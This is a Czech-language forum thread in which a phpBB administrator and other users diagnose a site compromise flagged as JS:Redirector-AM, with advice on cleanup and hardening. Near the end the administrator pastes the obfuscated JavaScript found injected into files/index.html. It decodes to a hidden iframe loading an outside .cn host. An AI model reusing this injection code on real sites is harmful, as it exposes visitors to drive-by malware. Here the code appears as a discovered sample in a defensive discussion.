Údajný trojan v gif souborech

[lemur]

Ahoj,

chtěl bych požádat o radu, ohledně jednoho trojského koně. Moc jsem k tomu nenašel, jen spíš že rád napadává Wordpress, ale k phpBB nic moc. Takže:

doména: scalecars.cz
verze: 3.0.2
skin: prosilver (upravený)
modifikace: AntiBotQuestion

Problém to hlásí jen určitému okruhu lidem, a dělá to jen Avast. Mě to Avast s aktuální DB nenahlásí, NOD32 také nic. Vyskakuje okno, které sděluje nález trojana JS:Redirector-AM [Trj], a to v souborech umístěných ve složce /styles/prosilver/theme/images/. Nález je v obrázkách, ale ještě jsem se nesetkal s nakaženým GIFem. Velikosti souborů v této složce odpovídají, co jsem kontroloval datumy na ftp tak také vše odpovídá. Dále je hlášen jeden případ, že po chvíly neaktivitě na fóru se načte stránka s odkazy na warez.

Screeny problému od uživatelů:
http://pictureup.cz/picture/verejny/510 ... trojan.jpg
http://www.jpeg.cz/images/648_vir.jpg

Co se týče fóra, tak kdysi byl problém, že v po DB byly rozmístěné iframy na čínské stránky. Ftp bylo vpořádku, po opravě tohoto problému byly změněny hesla do DB a na FTP, od té doby byl klid.

Neví někdo, co stím či co to vůbec má být? Budu rád za každou radu, díky.

[danti]

Pliagu hlasi ze mas v prosilver tak ten vymaz a nahraj novy


ja by som na tvojom mieste vsetko z ftp vymazal nahral novu verziu phpbb3.0.6 a aktualizoval forum

[R-stick]

Jo, už jsem se s tím setkal, že jsou napadené obrázkové soubory (gif, jpg) - resp je do adresářů s obrázky umístěn přesměrovávací kód nebo skript, maskující se jako obrázek. Takže doporučuji důkladnou deratizaci, změnu všech možných hesel a případnou změnu hostingu - někdy to bývá problém s nedostatečným zabezpečením hostingu, jehož správci toto dost podceňují, nebo se snaží hodit na jednotlivé uživatele.

[lemur]

danti - ve vzduchu tohle řešení visí, ale je to čistě až krajní řešení.

R-stick - ok, takže to "cosi" je někde v těch složkách a vidět to nemohu? Teoreticky tuhle část smazat, nahrát znovu a změnit hesla? Tu složku kde jim to stále něco hlásí jsem už včera smazal a nahrál novou. Napsal jsem na forum, jestli to ještě někomu vyskočí, tak ať napíše. Zatím si nikdo nestěžoval. Každopádně teď bude následovat změna hesla do DB a ftp, opět

Pokud to bude hostingem, tak s tím budou mít problém i jinde na fórech. Zkusím si proklepnout fóra co běží na stejném serveru.

Díky

[Jelínek]

Přesně tohle mi teď Avast hlásí v jednom jpg, který se stahuje z jiné domény.
Stáhl jsem kompletní obsah té domény a nechal porovnat Total Commanderem bajt po bajtu se zálohou a zkontrolovat Avastem a nic, je to stejné a v pořádku.
Podle mě je to chyba v Avastu, nikdo jiný mi problém nehlásí.

[lemur]

Je to tam zas... Celé stádo, už i v css. A už to vidím i já... Obrázky se nezobrazují. Neví někdo, jak se toho zbavit šetrnější formou, než nainstalovat znovu? (na to teď tak 2 týdny nemám vubec čas)

[kobra]

ked som používal TC mal som na fore každu chvílu nejaku haved.Skús zmeniť klienta ja ked som začal používať FileZilla viac sa problém neobjavil (je otázka dokedy?)no, ale zatial je all ok.

[danti]

Je to tam zas... Celé stádo, už i v css. A už to vidím i já... Obrázky se nezobrazují. Neví někdo, jak se toho zbavit šetrnější formou, než nainstalovat znovu? (na to teď tak 2 týdny nemám vubec čas)

co chces instalovat. ?? jednoducho nahraj phpbb 3.0.6 a spusti aktualizaciu nic sa ti z prispevkov nestrati alebo vymaz zo zlozky styles ten prosliver a nahraj novy

[lemur]

kobra - už delší dobu také používám FileZillu, takže pokud ta je vážně bezpečná, tak tam problém nebude.

danti - myslel jsem instalaci té 3.0.6, přidání pluginu a dohledání úprav templatu, které byly v průběhu, tudíž je nemám zálohované "čisté".

Píšeš o smazání templatu, to myslíš že pomuže? Nebude problém spíš někde celkově v tom fóru?

[danti]

tak ked nechces mazat a nahrat novy tak aspon skus dat iny styl co mas na fore za predvoleny a zbadas ci to roby aj na tom na jeden den vymen styly a skusaj

[R-stick]

Obávám se, že tak snadné to nebude.

Je totiž třeba vědět, proč, někdo na tvou stránku útočí, jak to dělá, a jaký z toho má prospěch. Takže: Prvořadým cílem takového útoku je nakazit tvůj počítač a udělat z něj tzv zombie - využitelný např pro rozesílání spamu. Útoky typu zavirovaného mailu, nebo souboru jsou už v dnešní době profláknuté a neefektivní, spolehlivější je napadení přes infikovanou webovou stránku, která je navíc důvěryhodná. Funguje to tak, že při její otevření si stáhneš nějaký javaskript, který využívá nějakou bezpečnostní díru ve tvém systému, nebo prohlížeči a nainstaluje ti do něj trojana, nebo něco jiného.

Zpočátku tito šmejdi vytvářeli vlastní "důvěryhodné" stránky, ovšem v poslední době přešli na taktiku průniku na cizí weby a úpravy html, nebo php souborů tak, že ti do něj vloží instrukci, která tě přesměruje na cizí web - např v okně 1x1 px a tam spustí skript, který se pokusí na tvůj počítač něco umístit. Pokud je to udělané dobře, tak ty nic nepoznáš, pokud je ta integrace provedena špatně, tak se ti web špatně zobrazuje (velké písmo, bordel ve stylování, rozhozený layout, nebo neobvyklé chyby). Cílem přitom je, aby na první pohled nebylo nic poznat, takže tě někdy zarazí až antivirák.

Jak to dělají? - v první fázi se pokusí získat přístup na FTP - např přes Total Commandera, nebo podobného klienta, a následně se pokusí o úpravu všech možných souborů (např index.php, nebo s koncovkou php- třeba v případě ZenCartu jsem se setkal s přes tisícovkou nakažených souborů napříč všemi adresáři) a zároveň si vytvoří zadní vrátka pro případ, že na některé soubory přijdeš a smažeš je. A v takovém případě ti nepomůže ani změna ftp přístupu, protože ti lezou do webu přes skript, a dokáží si upravit např atributy, nebo cokoliv do souboru doplnit. Takže ty si sice změníš heslo do všeho možného, jenomže tím je asi v polovině případů nezastavíš.

Co z toho pro tebe vyplývá? - Musíš si celý web odkontrolovat soubor po souboru - nebo je přehrát z čisté zálohy, či přeinstalovat z čisté instalace. Co se týče dat, databáze většinou bývá čistá, ale přesto doporučuji zkontrolovat ty záznamy, kde se potenciálně škodlivý kód může vyskytnout. Dále doporučuji provést DÚKLADNOU protivirovou kontrolu na svém compu - protože provtní vrítka můžeš mít na něm. Při vlastní deratizaci pak musíš celý web smazat, nahradit zálohou, nebo novou instalací, změnit všechna hesla, a zabezpečti přes soubor .htaccess tak, aby jsi do adresářů měl přístup pouze z tvoje IP - a nikdo jiný. Pokud se těchto problémů chceš natrvalo zbavit, nic jiného ti nezbyde. No a pokud po těchto opatřeních odchytneš trojana znovu, tak změň hosting - protože pak to je problém nedostatečného zabezpečení serveru ze strany poskytovatele.

[lemur]

Už dělám na kompletní deratizaci, každopádně jsem si něčeho všiml. Kdo má taky tento problém, tak si zkuste omrknout files/index.html, našel jsme tam připsáno:

Kód: Vybrat vše

<script language="JavaScript" type="text/javascript">
function D341EEF8D02D2E(B4ADC90D680B){var F2AFA=856;F2AFA=F2AFA-840;return(parseInt(B4ADC90D680B,F2AFA));}function AF915AF94(F8BC1BC6){var FFA00990D1B263=690;FFA00990D1B263=FFA00990D1B263-688;var C0C7ED626FD0="";for(AB25B4DD1=0;AB25B4DD1<F8BC1BC6.length;AB25B4DD1+=FFA00990D1B263){C0C7ED626FD0+=( String.fromCharCode(D341EEF8D02D2E(F8BC1BC6.substr(AB25B4DD1,FFA00990D1B263))));}eval(C0C7ED626FD0);}AF915AF94("69662028646F63756D656E742E636F6F6B69652E73656172636828227770663D322229203D3D202D3129207B0A796C6E793D646F63756D656E742E676574456C656D656E744279496428276577776927293B696628796C6E793D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D65777769207372633D687474703A2F2F67636F756E7465722E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D20227770663D323B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");
</script>

[PBs]

Bohužel se mi toto stalo,přesně se scriptem,který zde uvedl lemur. Vše jsem přepsal,ale za dva dny mi byly všechny soubory opět přepsány.
Mohl bych se zeptat,jak na toto: zabezpečti přes soubor .htaccess tak, aby jsi do adresářů měl přístup pouze z tvoje IP - a nikdo jiný ?
Díky

[Senky]

Mne sa to stávalo, pretože som používal web-based ftp klienta. Skúste si zmeniť FTP heslo...

[lemur]

Tak kompletní fórum je přehrané. Původní jsem natvrdo celé fórum smazal, tak jsem pak musel shánět starší verzi abych na ní opět dal DB a mohl udělat aktualizaci. Před tímto procesem, i po, byly změněny hesla jako do databáze, tak na ftp.

Doufám že už bude od toho klid

Díky všem za rady a tipy